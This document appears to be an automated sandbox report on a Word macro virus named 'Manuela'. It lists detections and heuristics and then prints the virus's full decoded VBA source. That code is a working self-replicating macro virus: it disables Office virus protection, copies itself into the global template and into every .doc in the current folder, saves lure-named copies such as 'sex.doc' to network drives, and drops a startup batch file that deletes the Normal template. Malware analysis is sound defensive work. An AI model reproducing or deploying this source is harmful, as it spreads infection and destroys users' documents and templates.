Verdict: MALICIOUS
Risk Score: 256
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1566.001 Spearphishing Attachment
The sample triggers critical heuristics for VBA macro viruses: it disables macro-virus protection and carries self-replication markers. The embedded VBA macro, named 'Manuela', attempts to export itself to 'c:\Manuela.drv' and disables virus protection, indicating malicious intent to execute further stages or persist. The ClamAV detections further confirm its malicious nature.
Heuristics: 6
- ClamAV: Win.Trojan.Pivis-2 (severity: critical, rule: CLAMAV_DETECTION)
  ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (severity: medium, 3 related findings, rule: OLE_VBA_MACROS)
  Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (severity: critical, rule: OLE_VBA_MACRO_VIRUS_REPLICATION)
  VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: Options.VirusProtection = False
- AutoOpen macro (severity: low, rule: OLE_VBA_AUTOOPEN)
  AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Auto_Close macro (severity: low, rule: OLE_VBA_AUTOCLOSE)
  Auto_Close macro
  Matched line in script: Sub AutoClose()
- Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
  OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64199 bytes |

SHA-256: 739c727198522af1806aace5b71c3fb1b22717618ad574df9fd64382755c25d4
Detection (ClamAV): Doc.Trojan.Vmpc-1
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Manuela"
Sub Manuela()
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
UsEoVgKv = UiUt11709 & HmIn7730
IpUi10290 = UiUt11709 & BqTe6576 & Int(Rnd * 7793)
RrVn3588 = DvTzRjCg & KzQz9188 & Int(Rnd * 2527)
RrVn3588 = KhIu7369 & KzQz9188 & Int(Rnd * 3812)
UnTz3410 = GeKe14820 & VsLi17336 & Int(Rnd * 8167)
KhTuQjTw = GlUe9172 & GnMs9323
MpTq4803 = GlUe9172 & HuGm14936 & Int(Rnd * 7863)
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
VBE.ActiveVBProject.VBComponents("Manuela").Export "c:\Manuela.drv"
RpUe6243 = QqIkQqAo & NuJn4083 & Int(Rnd * 724)
RpUe6243 = EoJu2364 & NuJn4083 & Int(Rnd * 955)
CgHz8684 = LqQwJzEu & EgEp14649 & RqOwRqEw & HpDx11314
CgHz8684 = HpDx11314 & EgEp14649 & Int(Rnd * 4211)
QwBk4696 = HvVzMwFv & MfSi12772 & Int(Rnd * 5161)
QwBk4696 = AiGg6151 & MfSi12772 & Int(Rnd * 5920)
ActiveDocument.ReadOnlyRecommended = False
BfFqMuRo = IgNj8349 & RfGh13422
ShLs17516 = IgNj8349 & GjBf10447 & Int(Rnd * 3554)
OqFnThCr = MqOj10739 & PiRy8200
IhJv11053 = MqOj10739 & AwEf5529 & Int(Rnd * 3766)
HxHq9017 = IoJwEsKi & IeGm10210 & Int(Rnd * 5916)
HxHq9017 = PrQi5723 & IeGm10210 & Int(Rnd * 5193)
LqUr11219 = BhQyRpKv & OkQo8309 & LlDjRmOm & FgUm7944
LqUr11219 = FgUm7944 & OkQo8309 & Int(Rnd * 4257)
InOt19088 = AxOkTlAh & DtBe9899 & Int(Rnd * 9096)
InOt19088 = NqAz15248 & DtBe9899 & Int(Rnd * 8894)
DqFg = Int(Rnd * 100)
If DqFg = 99 Then MsgBox "Perfect !", vbSystemModal
NuGuIkOs = BsVz15822 & JsVu10684
BpNo9123 = BsVz15822 & MiEh7405 & Int(Rnd * 7365)
UtSz6230 = OeMpMlGw & CmEt10041 & Int(Rnd * 290)
UtSz6230 = RvIf14097 & CmEt10041 & Int(Rnd * 6030)
ArMzMqBz = EgNj3704 & GzJf11337
OkFu4624 = EgNj3704 & EyLi8116 & Int(Rnd * 2448)
If Month(Now()) = 12 Then Call FqFl1072DzRp
MnCfFnGx = UgMy8855 & AwJk11076
UmJr13920 = UgMy8855 & CnGn9780 & Int(Rnd * 5023)
TfCk8028 = BiPh2384 & IeSk2892 & Int(Rnd * 410)
GtRvTtCg = HnIm13951 & MgQz12329
PuOp14278 = HnIm13951 & CgQz13483 & Int(Rnd * 6312)
FgAf7053 = HxGkJkDo & UnNz9612 & Int(Rnd * 5350)
FgAf7053 = SpPw7311 & UnNz9612 & Int(Rnd * 551)
NqNt9587 = ToGlRxKo & HqDx3271 & Int(Rnd * 1178)
NqNt9587 = QgKl3940 & HqDx3271 & Int(Rnd * 597)
FgDg3981 = MpUsClFx & UiIt10397 & Int(Rnd * 3575)
FgDg3981 = HpEh13037 & UiIt10397 & Int(Rnd * 3571)
If Month(Now()) = 7 And Day(Now()) = 17 Then MsgBox "Manuela is 17 !!!", vbInformation, "Birthday Greeting!!!"
HfCf7564 = FeRgLgHn & NsUr7025 & Int(Rnd * 3210)
HfCf7564 = IuEw14266 & NsUr7025 & Int(Rnd * 7177)
MjEhRqIn = QtMj15010 & DnAw7002
IlHm6528 = QtMj15010 & GjNz3128 & Int(Rnd * 8770)
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Readme"
.Subject = " "
.Execute
End With
KzOyCnDq = SwDq13116 & RqCx14208
TiFu12301 = SwDq13116 & GgUr18781 & Int(Rnd * 6287)
EqPy16979 = OoCvQsOo & DuSl9923 & Int(Rnd * 4935)
EqPy16979 = UqJe7784 & DuSl9923 & Int(Rnd * 6849)
EeAs9706 = TsSqHrBw & AhGn14505 & KoLmKtTl & LxQv12305
EeAs9706 = LxQv12305 & AhGn14505 & Int(Rnd * 7693)
FoRmBeTe = ArEp16803 & HeTv12433
DfDt13051 = ArEp16803 & HoLj18663 & Int(Rnd * 7107)
JoUr5819$ = "c:\windows\startm~1\programs\startup\msfile.bat"
JnIv13873 = BlMj10017 & DpUp8234 & Int(Rnd * 1629)
IsPu18836 = SzQfOqCw & GiLj3390 & Int(Rnd * 9111)
IsPu18836 = NlJm10253 & GiLj3390 & Int(Rnd * 9777)
VhEq10723706 = GetAttr(NormalTemplate.FullName)
JjRvUiGi = AuBr14435 & TiBi12094
PmIi8897 = AuBr14435 & CzNo14007 & Int(Rnd * 8325)
CmJe8433 = HtSrEiGn & HrPu8140 & CyRmAqPy & HkMj6319
CmJe8433 = HkMj6319 & HrPu8140 & Int(Rnd * 5094)
If VhEq10723706 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(JoUr5819$)
SzBx10683 = IhKoOhHm & LvLu7785 & IpDuUnAk & QqQh17377
SzBx10683 = QqQh17377 & LvLu7785 & Int(Rnd * 7552)
EjEp7743 = MyDq6814 & CeDm8876 & Int(Rnd * 2822)
If VhEq10723706 = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(JoUr5819$)
QjHv15134 = QlCj10659 & UiSw5528 & Int(Rnd * 9074)
FsAgQfJm = VtOx9926 & SmAu7969
PhEl10861 = VtOx9926 & AgQp9636 & Int(Rnd * 3197)
If VhEq10723706 = vbReadOnly Then GoTo MtHfKhDn
LhEy6349 = PhBuCfTi & RyIi11276 & Int(Rnd * 9225)
LhEy6349 = MqOp12462 & RyIi11276 & Int(Rnd * 3126)
MjFl13695 = CnMoEuVv & OiPu16382 & Int(Rnd * 4649)
MjFl13695 = TiNq7469 & OiPu16382 & Int(Rnd * 5984)
If VhEq10723706 = vbReadOnly + vbArchive Then GoTo MtHfKhDn
BpCxViFl = NtTm14604 & KlBl10162
BuPl10231 = NtTm14604 & OkGm10989 & Int(Rnd * 9473)
TnKs10337 = TzSrViSh & IzQq3154 & OrJrFqAm & TxLk7627
TnKs10337 = TxLk7627 & IzQq3154 & Int(Rnd * 1417)
RvTz9063 = GeTsRuBu & PnDy16787 & GePrRnTz & PkHu11639
RvTz9063 = PkHu11639 & PnDy16787 & Int(Rnd * 8816)
LuSh6694 = EmQrRfJn & TuDn5909 & Int(Rnd * 794)
LuSh6694 = JjTm12214 & TuDn5909 & Int(Rnd * 9261)
If NormalTemplate.VBProject.VBComponents.Item("Manuela").Name <> "Manuela" Then FtRy370638518 = True
FpOx10562 = HzUjCnQe & SiIj16550 & Int(Rnd * 8456)
FpOx10562 = VvKs9013 & SiIj16550 & Int(Rnd * 456)
GkEy8671 = IeTfFtKg & PuVv10609 & Int(Rnd * 1327)
GkEy8671 = UvCi13049 & PuVv10609 & Int(Rnd * 9286)
If ActiveDocument.VBProject.VBComponents.Item("Manuela").Name <> "Manuela" Then QkRj385111 = True
GfVf10635 = TvQo8539 & NxDw16238 & Int(Rnd * 4157)
PwRz8552 = HxIwQzTu & AiSk9375 & Int(Rnd * 186)
PwRz8552 = CfSu4684 & AiSk9375 & Int(Rnd * 2190)
If FtRy370638518 = True And QkRj385111 = False Then Set RjKp3851370613 = NormalTemplate.VBProject.VBComponents
If FtRy370638518 = False And QkRj385111 = True Then Set RjKp3851370613 = ActiveDocument.VBProject.VBComponents
RjKp3851370613.import "c:\Manuela.drv"
RwEzDhSt = JsQo1144 & RsUh8491
QyBo9753 = JsQo1144 & UfPl6052 & Int(Rnd * 1088)
NoMj12241 = JiRsQiHx & KlSl8166 & EjAvKpHx & KoLk8934
NoMj12241 = KoLk8934 & KlSl8166 & Int(Rnd * 7739)
If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
QrPg17444 = ExFxVmQf & UgQf5790 & EqEoOnPs & NeUl5902
QrPg17444 = NeUl5902 & UgQf5790 & Int(Rnd * 82)
KmHv7457 = ShEuTsVx & SzKn4861 & EyDzMwMe & CrMy11245
KmHv7457 = CrMy11245 & SzKn4861 & Int(Rnd * 5235)
KzUe7802 = HmSqMrLg & VvFr9493 & UwUhFtMx & VkRv10997
KzUe7802 = VkRv10997 & VvFr9493 & Int(Rnd * 1371)
HzFqEeAl = BxNx12541 & MkDj9301
EjHq14670 = BxNx12541 & DwUg9662 & Int(Rnd * 5842)
If QkRj385111 = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
JvSi3111 = LxThJkGx & EjNp9281 & Int(Rnd * 7272)
JvSi3111 = IzSu10985 & EjNp9281 & Int(Rnd * 5655)
VuKfPlQj = IxBy11899 & SjFo13687
TnIr13409 = IxBy11899 & IhVv12367 & Int(Rnd * 8396)
CkIq11087 = UnIyCpDv & KlIi3035 & Int(Rnd * 5827)
CkIq11087 = AsNj11312 & KlIi3035 & Int(Rnd * 2236)
HoOx14146 = AfKl10241 & LsUg3178 & Int(Rnd * 4062)
'VMPCK v1.0d [The Final Version?]
MtHfKhDn:
End Sub
Sub HelpAbout()
On Error Resume Next
PnLj15824 = CtOfCzKn & DvIj14792 & CgQkKnMl & LtLz10162
PnLj15824 = LtLz10162 & DvIj14792 & Int(Rnd * 1346)
SxUn6409 = VyGv6646 & NtKo11893 & Int(Rnd * 1675)
MsgBox "Do you love me ?", vbInformation
AjFh13229 = MfImVeTi & TwQe10515 & CrNuTtHh & EuDi9351
AjFh13229 = EuDi9351 & TwQe10515 & Int(Rnd * 2752)
HgKkUfMt = BzBj5665 & BtGi14835
QmIi12480 = BzBj5665 & RnDm10634 & Int(Rnd * 1932)
End Sub
Sub FileExit()
On Error Resume Next
EsNk17397 = PiUt7063 & AiIh14244 & Int(Rnd * 6686)
FhTqDlDh = OuGg9115 & LhBw4288
AzUi8266 = OuGg9115 & QhDl5360 & Int(Rnd * 4603)
Call Manuela
BmThGiQz = OrJe11482 & VzUn14626
KsOt12420 = OrJe11482 & VsBg10017 & Int(Rnd * 3384)
EpLkTrIq = IsJe15179 & QrAz15070
QtNp17861 = IsJe15179 & RqGx10110 & Int(Rnd * 9918)
If ActiveDocument.Saved = False Then ActiveDocument.Save
OiHm14206 = AqBkGqDu & HoVm13794 & AsFhHnJf & JnCq4425
OiHm14206 = JnCq4425 & HoVm13794 & Int(Rnd * 2611)
DmLe15360 = MlKeTjHw & InJp18925 & Int(Rnd * 8959)
DmLe15360 = SkAr12045 & InJp18925 & Int(Rnd * 8113)
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Manuela
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Manuela
End If
Loop
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "h:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "f:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
Application.Quit
LpBr9938 = NoBv9802 & AeSk7435 & Int(Rnd * 6989)
GpSh11570 = ElBu886 & QiUo7504 & Int(Rnd * 879)
End Sub
Sub AutoOpen()
On Error Resume Next
GnUu11153 = GlLwPyVw & TuIs13183 & Int(Rnd * 4407)
GnUu11153 = JsNg1606 & TuIs13183 & Int(Rnd * 1041)
PjRnPnJm = CwBo8426 & DhGn7674
DrUi4404 = CwBo8426 & IkSt14249 & Int(Rnd * 3665)
Call Manuela
SeJh15034 = BjOlUrMj & QgGw12896 & Int(Rnd * 5058)
SeJh15034 = KwSy13747 & QgGw12896 & Int(Rnd * 7388)
VyNwDsLm = DpVi18584 & LhUz13522
KuDo11046 = DpVi18584 & CfUp11020 & Int(Rnd * 9098)
End Sub
Sub AutoExit()
On Error Resume Next
DxFlFpDf = LmGl10782 & HvQn15792
MfNw13866 = LmGl10782 & SkDm8694 & Int(Rnd * 6731)
CfKe17403 = ExRmUlEq & NwGl3776 & QmGjMyKi & PxGk13172
CfKe17403 = PxGk13172 & NwGl3776 & Int(Rnd * 6943)
Call Manuela
NxQlCwCu = NyIy11786 & PpIt11981
PzGu7178 = NyIy11786 & DrPs10377 & Int(Rnd * 7904)
OhEfKhBz = InMn10377 & PtRz8953
EoVv7570 = InMn10377 & EkSv6556 & Int(Rnd * 7434)
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Manuela
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Manuela
End If
Loop
If ActiveDocument.Saved = False Then ActiveDocument.Save
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "r:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "s:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
End Sub
Sub AutoExec()
On Error Resume Next
BlPx5440 = QxOe7683 & PtDk8146 & Int(Rnd * 2073)
BtVwFmJq = NsGz2013 & LkAn18533
OeMw17449 = NsGz2013 & LuOj15321 & Int(Rnd * 339)
Call Manuela
EmPk6368 = PkTxSnNw & GnVu9879 & Int(Rnd * 6892)
EmPk6368 = BvOt13917 & GnVu9879 & Int(Rnd * 8536)
LqEfJsSx = PgUi9892 & HrLu9187
EvFg12950 = PgUi9892 & EnVk6032 & Int(Rnd * 5421)
End Sub
Sub AutoClose()
On Error Resume Next
BnRiCpAv = KgTy15044 & CoKz8926
LxJz12248 = KgTy15044 & ByQp7696 & Int(Rnd * 7996)
JqBr6355 = MiAh8573 & HqGm10808 & Int(Rnd * 3383)
Call Manuela
FjNw12605 = VpFrDpNu & BrEf1400 & RsKxQvTz & SmPl10140
FjNw12605 = SmPl10140 & BrEf1400 & Int(Rnd * 9285)
RrAn5380 = MoGhNqBo & TyBf7528 & Int(Rnd * 6625)
RrAn5380 = HpAv13499 & TyBf7528 & Int(Rnd * 3524)
End Sub
Sub ToolsMacro()
On Error Resume Next
EfMe17914 = CeGiAhIp & GgNz11188 & Int(Rnd * 2454)
EfMe17914 = FgRk10128 & GgNz11188 & Int(Rnd * 3570)
RrCn12307 = SgUqGrDx & TuSv8314 & Int(Rnd * 4784)
RrCn12307 = SpLh9227 & TuSv8314 & Int(Rnd * 6544)
Call Manuela
TqBn5891 = LrRzPmFn & MiIt14940 & Int(Rnd * 4419)
TqBn5891 = TuLw456 & MiIt14940 & Int(Rnd * 151)
BjSkOsDl = GtTj11200 & EfBo14853
UwGt14855 = GtTj11200 & FvBf11045 & Int(Rnd * 1744)
KtFf10628 = QxBhPwMf & FrIt6700 & VyGfVpTo & IwKp9305
KtFf10628 = IwKp9305 & FrIt6700 & Int(Rnd * 9260)
JjNj17118 = PvJiVuVo & HvNn9761 & GhDiLyGe & FqPs17602
JjNj17118 = FqPs17602 & HvNn9761 & Int(Rnd * 9355)
MsgBox "Word Basic Err =7"
QpVz8034 = DiSoLxVx & VsQp12422 & UoDoHvNj & BxBv8494
QpVz8034 = BxBv8494 & VsQp12422 & Int(Rnd * 667)
ItAe13189 = GrKh16622 & LqGl8502 & Int(Rnd * 9613)
End Sub
Sub FileTemplates()
On Error Resume Next
VyHh12201 = MlTj6207 & CfIr6151 & Int(Rnd * 4602)
VhOf7165 = CqQySwAx & FtVl11306 & Int(Rnd * 321)
VhOf7165 = ClQl6443 & FtVl11306 & Int(Rnd * 2751)
Call Manuela
TjJxRkBg = LuIr10625 & VwCx9944
FxIq17223 = LuIr10625 & BoBq11923 & Int(Rnd * 1299)
PxIl16759 = NjToIoEn & GhDw6058 & NyJpTsKw & SkTj12507
PxIl16759 = SkTj12507 & GhDw6058 & Int(Rnd * 8066)
IoBi9010 = OuKlSnFn & KkVw5702 & ToSxRoQh & GqBh3568
IoBi9010 = GqBh3568 & KkVw5702 & Int(Rnd * 526)
QuEx6070 = CxKp13003 & BpNo16792 & Int(Rnd * 5795)
MsgBox "Word Basic Err =7"
GuGg13462 = GlJi6848 & TtGy13444 & Int(Rnd * 2048)
QrOjNhEk = KtVw16115 & UeBn5820
FsDs9189 = KtVw16115 & VrEr7554 & Int(Rnd * 6170)
End Sub
Sub ViewVBCode()
On Error Resume Next
BsEk14676 = VuCrGlRi & QnSk9193 & Int(Rnd * 502)
BsEk14676 = BpVp8652 & QnSk9193 & Int(Rnd * 6099)
CuFt12022 = IzMlIeUw & NtDw14298 & Int(Rnd * 5858)
CuFt12022 = IiUp13657 & NtDw14298 & Int(Rnd * 8956)
Call Manuela
LpReSkAj = CtEl10794 & MzCe8013
NjOs8558 = CtEl10794 & NvQo8907 & Int(Rnd * 2447)
JyKz8665 = DpSpDoQh & IoEs11069 & CqBtCrRk & JxSk13815
JyKz8665 = JxSk13815 & IoEs11069 & Int(Rnd * 4390)
PzNuMqAr = VkNn1461 & QmQz8065
AoRl9201 = VkNn1461 & TpUz16624 & Int(Rnd * 1324)
MsgBox "Word Basic Err =7"
BjRp5022 = KyQoAlHn & SjNp3825 & Int(Rnd * 2069)
BjRp5022 = VjEm8404 & SjNp3825 & Int(Rnd * 2235)
FeStKvMp = GvQl8833 & RkFx14514
LiMj10701 = GvQl8833 & AkDk6388 & Int(Rnd * 2963)
End Sub
Sub FqFl1072DzRp()
On Error Resume Next
SvEk6998 = OrUzKzIh & OjJx8526 & Int(Rnd * 2602)
SvEk6998 = JvJi9239 & OjJx8526 & Int(Rnd * 2260)
TqVm8963 = IuBo14728 & MmNy4156 & Int(Rnd * 7130)
Selection.HomeKey Unit:=wdStory
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = ". "
.Replacement.Text = ". Manuela said:"
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = True
.MatchAllWordForms = False
End With
Selection.Find.Execute Replace:=wdReplaceAll
FlRk6879 = NnItUjRv & VtGm17291 & Int(Rnd * 1395)
FlRk6879 = OeDu10873 & VtGm17291 & Int(Rnd * 5163)
VrVv9891 = HtKtJvJi & CgJm5889 & Int(Rnd * 2987)
VrVv9891 = QsAg10963 & CgJm5889 & Int(Rnd * 3595)
CommandBars("edit").Controls("Undo VBA-Find.Execute").Delete
SgJr12379 = LpDeVkOx & OmNm8002 & Int(Rnd * 7964)
SgJr12379 = QoRz8754 & OmNm8002 & Int(Rnd * 247)
NoCrIqTk = TeEe5721 & LfKq11198
VjNo17582 = TeEe5721 & ChLg5627 & Int(Rnd * 2588)
CommandBars("edit").Controls("Repeat Replace...").Delete
BxGg15784 = CuErByTx & RpUp12778 & OxRgJyHx & NqTx17434
BxGg15784 = NqTx17434 & RpUp12778 & Int(Rnd * 8208)
AoTm6130 = NySnQxJh & UkPt7410 & IvMkCvHv & KkCu7187
AoTm6130 = KkCu7187 & UkPt7410 & Int(Rnd * 4344)
CommandBars("edit").Controls("Replace...").Delete
JxEx14808 = IxTq12361 & HxPh9498 & Int(Rnd * 8349)
AiArLeKr = UzDu17174 & KlHj10493
VkSp11439 = UzDu17174 & DvBr17197 & Int(Rnd * 8628)
If ActiveDocument.Saved = False Then ActiveDocument.Save
End Sub
Sub vBitchES(strFile As String)
Dim hFile As Long
On Error Resume Next
JyHy11736 = TxEgKnOu & HtJx10284 & Int(Rnd * 6932)
JyHy11736 = TxIy8089 & HtJx10284 & Int(Rnd * 1370)
SiJv7437 = DyFk13745 & AmKp11280 & Int(Rnd * 5413)
n$ = NormalTemplate
QqNf12307 = UmCf16305 & GjGm3346 & Int(Rnd * 6773)
BoLn13986 = KgUfOnFx & UlRp4960 & DxAhBjIt & JfDt6227
BoLn13986 = JfDt6227 & UlRp4960 & Int(Rnd * 4057)
Part11$ = "attrib -h -r "
LvVr12759 = GyGwIfMw & DuLv10140 & Int(Rnd * 2849)
LvVr12759 = CjUw9079 & DuLv10140 & Int(Rnd * 4852)
EnOqMnPu = HfRk11784 & DxMn15430
PhHl9580 = HfRk11784 & JwSl18761 & Int(Rnd * 5929)
snag$ = "c:\progra~1\micros~1\templa~1\"
JyLgMwUk = EkPl8099 & NnRo17206
KkJm8831 = EkPl8099 & IoFt18880 & Int(Rnd * 5110)
UqPp13747 = IvTrNyBi & MjKo12490 & Int(Rnd * 9825)
UqPp13747 = SpMu19495 & MjKo12490 & Int(Rnd * 9864)
snag1$ = "c:\progra~1\micros~2\templa~1\"
QxVn4617 = KnUgGeAi & GhFs13606 & HzUmSgLu & RfUi11548
QxVn4617 = RfUi11548 & GhFs13606 & Int(Rnd * 7780)
EqQx8771 = BhLzLzNx & LtDn8264 & DiTzVyDr & RyBf13915
EqQx8771 = RyBf13915 & LtDn8264 & Int(Rnd * 6561)
Part2$ = "del "
KrPt14212 = UhAsSsEu & HrIi8357 & Int(Rnd * 720)
KrPt14212 = LzBf7613 & HrIi8357 & Int(Rnd * 3096)
AkGq12366 = IzHjSeUi & DeIs13961 & BmLzUjFn & HuQk10488
AkGq12366 = HuQk10488 & DeIs13961 & Int(Rnd * 5321)
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, "@echo off"
Print #hFile, Part11$ + snag$ + n$
Print #hFile, Part11$ + snag1$ + n$
Print #hFile, Part2$ + snag$ + n$
Print #hFile, Part2$ + snag1$ + n$
Print #hFile, "cls"
Print #hFile, Part2$ + "c:\windows\startm~1\programs\startup\msfile.bat"
Close hFile
SpAuDrRn = QrOl8109 & SrDf9427
LoLj13522 = QrOl8109 & DzSv9093 & Int(Rnd * 825)
UqMo16819 = CgFiUxAv & MnPt11705 & Int(Rnd * 6962)
UqMo16819 = HqCm13769 & MnPt11705 & Int(Rnd * 6844)
KfQwFwKs = DmDs1222 & CvUm12741
BmKe16639 = DmDs1222 & BgKy9853 & Int(Rnd * 1200)
End Sub
' Processing file: /tmp/qstore_2uge51bb
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Manuela - 27928 bytes
…